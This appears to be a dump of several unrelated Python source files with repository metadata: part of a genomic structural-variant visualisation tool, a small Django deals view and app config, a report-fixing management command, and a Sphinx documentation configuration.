self.out_dir = None
# switch for gui mode
self.gui = False
# refgene manager
self.ref_genes = None
# vcf for including population frequencies
self.ref_vcf = None
# include calls that are not present in samples
self.all = False
# reference genome fasta file
self.fa = None
# get configurations
# include defaults in case they are accidentally deleted
self.display = 'display'
self.rd_len = 100
self.expansion = 1
self.bkpt_win = 5
self.num_bins = 100
def get_bams(self, samples):
bams = []
for s in samples:
bams.append(self.bams[self.samples.index(s)])
return bams
def read_samples_file(self, filepath):
check_file_exists(filepath)
for line in open(filepath):
if len(line.split()) > 2:
print("Error: %d fields detected in manifest, expected 2.\n" % len(line.split()))
exit(1)
elif len(line.split()) < 2:
continue
self.samples.append(line.split()[0].strip())
self.bams.append(line.split()[1].strip())
check_file_exists(self.bams[-1])
# set up the input vcfs (comma separated list, names included with colons name:file or file)
def set_vcfs(self, vcfs_arg):
for sv_vcf in vcfs_arg.split(','):
if ':' in sv_vcf:
check_file_exists(expu(sv_vcf.split(':')[1]))
vcf = VCFManager(expu(sv_vcf.split(':')[1]), name=sv_vcf.split(':')[0])
else:
check_file_exists(sv_vcf)
vcf = VCFManager(sv_vcf)
if self.vcf is None:
self.vcf = vcf
else:
self.alt_vcfs.append(vcf)
def check(self):
if not self.vcf:
print(usage)
print("Error: please specify a VCF file")
exit(1)
if not self.out_dir:
print(usage)
print("Error: please specify out directory")
exit(1)
if not self.samples:
print(usage)
print("Error: please specify samples to visualise")
exit(1)
if not self.bams:
print(usage)
print("Error: please specify BAM/SAM files")
exit(1)
if not len(self.bams) == len(self.samples):
print(usage)
print("Error:\nRequires same number of samples and alignments")
exit(1)
for b in self.bams:
check_file_exists(b)
delete = []
for i, s in enumerate(self.samples):
if s not in self.vcf.samples:
print("Sample ID not found in VCF: %s - removing from list" % s)
delete.append(i)
for i in sorted(delete, reverse=True):
del self.samples[i]
del self.bams[i]
# class to store parameters for filtering SVs from VCF
class FilterParams:
valid = ('-max_len', '-min_len', '-af', '-rgi', '-gene_list', '-gts', '-chrom', '-exonic', '-svtype')
def __init__(self, parent):
self.parent = parent
# threshold for for filtering AF
self.AF_thresh = None
# Allele Frequency threshold is less than
self.AF_thresh_is_LT = True
# specific chromosome/molecule/contig
self.chrom = None
# Dict of list of accepted gentypes for each sample for filtering
# if sample is not in dict it is not filtered
self.sample_GTs = {}
# DEL/DUP/CNV/INV
self.svtype = None
# path to genes list file
self.gene_list = []
# switch for filtering by gene list
self.gene_list_intersection = False
# intersection with refgenes
self.RG_intersection = False
# filter SVs by length
self.min_len = None
self.max_len = None
# pointer to refgenes
self.ref_genes = None
# filter for SVs that intersect exons only
self.exonic = False
# class to store parameters for what to show in R plots
class PlotParams:
valid = ('-d', '-or', '-v', '-ss', '-se', '-su', '-cl', '-i', '-r', '-af', '-l', '-gc', '-dm', '-separate_plots',
'-l_svs')
def __init__(self):
self.gc = False
self.depth = True
self.orphaned = True
self.inverted = True
self.samestrand = True
self.secondary = False
self.supplementary = False
self.clipped = True
self.ins = True
self.refgene = True
self.sv_af = True
self.legend = True
self.diff_mol = True
self.grouping = 8
self.l_svs = False
# command line arguments for calling Rscipt
def get_R_args(self):
args = []
if self.depth:
args.append("-d")
if self.orphaned:
args.append("-or")
if self.inverted:
args.append("-v")
if self.samestrand:
args.append("-ss")
if self.secondary:
args.append("-se")
if self.supplementary:
args.append("-su")
if self.clipped:
args.append("-cl")
if self.ins:
args.append("-i")
if self.refgene:
args.append("-r")
if self.sv_af:
args.append("-af")
if self.legend:
args.append("-l")
if self.gc:
args.append("-gc")
if self.diff_mol:
args.append("-dm")
return args
def example(argv):
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'example')
if not os.path.exists(path):
print('Error: example directory not found')
exit(1)
samples = {}
samples['NA12877_S1'] = os.path.join(path, 'NA12877_S1.partial.bam')
samples['NA12878_S1'] = os.path.join(path, 'NA12878_S1.partial.bam')
samples['NA12884_S1'] = os.path.join(path, 'NA12884_S1.partial.bam')
for s in samples:
if not os.path.isfile(samples[s]):
print('Error: example file not found.\n%s' % samples[s])
exit(1)
run_argv = []
for a in argv:
if not a == '-example':
run_argv.append(a)
run_argv.append('-samples')
run_argv.append(','.join(samples.keys()))
run_argv.append('-aln')
run_argv.append(','.join(samples.values()))
run_argv.append('-vcf')
run_argv.append('Delly:{},CNVnator:{},Lumpy:{}'.format(os.path.join(path, 'delly.vcf'),
os.path.join(path, 'cnvnator.vcf'),
os.path.join(path, 'lumpy.vcf')))
run_argv.append('-ref_vcf')
run_argv.append('1000G:' + os.path.join(path, '1000G.vcf'))
run_argv.append('-ref_gene')
run_argv.append(os.path.join(path, 'hg38.refgene.partial.txt'))
run_argv.append('-o')
run_argv.append(os.path.join(os.path.expanduser("~"), 'svpv_output'))
main(argv=run_argv)
if '-gui' not in argv:
print('\nSuccess!\n')
if __name__ == "__main__":
print('\n{}'.format(info))
main()
| [
"j.munro@victorchang.edu.au"
] | j.munro@victorchang.edu.au | |
4a8fa2aaff8f385966cf031d5fcfd0ab012dcd2e | b943573bc5591cc99c3dc902cf0d2c5c4dd8a84d | /sokoapp/deals/views.py | 499962adc60216ffb63bc316503953ccb34906cd | [
"MIT"
] | permissive | Mercy-Nekesa/sokoapp | b4141f51c430a3ac2378bbb906ccecaa8bef4fc7 | 6c7bc4c1278b7223226124a49fc33c5b8b6b617a | refs/heads/master | 2020-06-04T16:49:47.909730 | 2014-11-14T09:28:01 | 2014-11-14T09:28:01 | 26,276,861 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | import datetime
from django.shortcuts import render_to_response
from django.template import RequestContext
from deals.models import Deal, DealForm
def home(request):
today_datetime = datetime.datetime.now()
year = today_datetime.year
month = today_datetime.month
if (month >= 1) and (month <=9):
month = '0' + str(month)
day = today_datetime.day
if (day>=1) and (day<=9):
day ='0' + str(day)
today = str(year) + '-' + str(month) + '-' + str(day)
deals = Deal.objects.filter(date=today)
return render_to_response("home.html", {'request': request, 'deals': deals, 'today_datetime': today_datetime}, context_instance=RequestContext(request))
def about_us(request):
pass
def contact_us(request):
pass
| [
"hungaiinc@gmail.com"
] | hungaiinc@gmail.com |
8de870f3af92cf92143f9d5164aeaa2dcdb4bc57 | baf9b3674cedea6ebf75f5b0f3618528bf385bb3 | /attibutes/apps.py | 77d00b6eb4a087fe9cbb6a96d52d148b7165a69f | [] | no_license | ElfKnell/spiridonis | 3377f73a23802017e3f97f4601bc3f8541c5cb0b | 95cb29f02ec9d0745b68520e520f80a45a618dca | refs/heads/master | 2023-07-06T15:39:09.985267 | 2021-08-17T11:59:12 | 2021-08-17T11:59:12 | 385,142,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | from django.apps import AppConfig
class AttibutesConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'attibutes'
| [
"akyrych84@gmail.com"
] | akyrych84@gmail.com |
74f7d3abd0651251a5f4df57b6ba25d86f69998d | 4cca59f941adce8a2d71c00c0be5c06857f88dcc | /snisi_maint/management/commands/fix_61_meta_numbers.py | 0d0520383b86d61f2a23a6f0944abc86ea74c739 | [
"MIT"
] | permissive | brahimmade/snisi | 7e4ce8e35150f601dd7b800bc422edec2d13063d | b4d0292b3314023ec9c984b776eaa63a0a0a266f | refs/heads/master | 2023-05-07T19:04:04.895987 | 2017-12-29T18:58:22 | 2017-12-29T18:58:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import logging
from django.core.management.base import BaseCommand
from snisi_core.models.Periods import MonthPeriod
from snisi_core.models.Reporting import SNISIReport
logger = logging.getLogger(__name__)
class Command(BaseCommand):
def handle(self, *args, **options):
logger.info("Issue #61. Wrong counts in Agg meta")
december = MonthPeriod.from_url_str("12-2014")
for report in SNISIReport.objects.filter(period=december):
report = report.casted()
if not hasattr(report, 'update_expected_reportings_number'):
continue
logger.info(".{}".format(report))
report.update_expected_reportings_number()
report.save()
logger.info("done.")
| [
"rgaudin@gmail.com"
] | rgaudin@gmail.com |
f90bf58437dfe1b858c104b4f6836d327abe2bcb | e87a2da813838195f0b58e672e92e40724072af1 | /conf.py | 720ef966dee2efe771d6d888cf87609be0a7ac9c | [] | no_license | JhymerMartinez/SEDD_Manual_Del_Estudiante | 9c7e4301c75b6c14e0f8fa245cc582ac93cd8a9c | b2517fd3c81dff7b9efd553ff645e326aa69b778 | refs/heads/master | 2021-01-25T12:14:37.061368 | 2014-03-24T21:42:35 | 2014-03-24T21:42:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,847 | py | # -*- coding: utf-8 -*-
#
# SEDD_Manual_De_Usuario documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 13 15:30:07 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.pngmath',
'sphinx.ext.mathjax', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode','rst2pdf.pdfbuilder']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'SEDD - Manual Del Estudiante'
copyright = u'2013, Ing. Milton Labanda, Jhymer Martínez'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = ''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bootstrap'
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'SEDD_Manual_Del_Estudiantedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto/manual]).
latex_documents = [
('index', u'SEDD_Manual_Del_Estudiante.tex', u'SEDD\\ Manual\\ Del\\ Estudiante Documentation',
u'Ing. Milton Labanda, Jhymer Martínez', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
pdf_documents = [('index', u'SEDD_Manual_Del_Estudiante',
u'Sphinx', u'Ing. Milton Labanda, Jhymer Martínez'),]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sedd_manual_del_estudiante', u'SEDD_Manual_Del_Estudiante Documentation',
[u'Ing. Milton Labanda, Jhymer Martínez'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'SEDD_Manual_Del_Estudiante', u'SEDD_Manual_Del_Estudiante Documentation',
u'Ing. Milton Labanda, Jhymer Martínez', 'SEDD_Manual_Del_Estudiante', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"jamartinezg@unl.edu.ec"
] | jamartinezg@unl.edu.ec |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.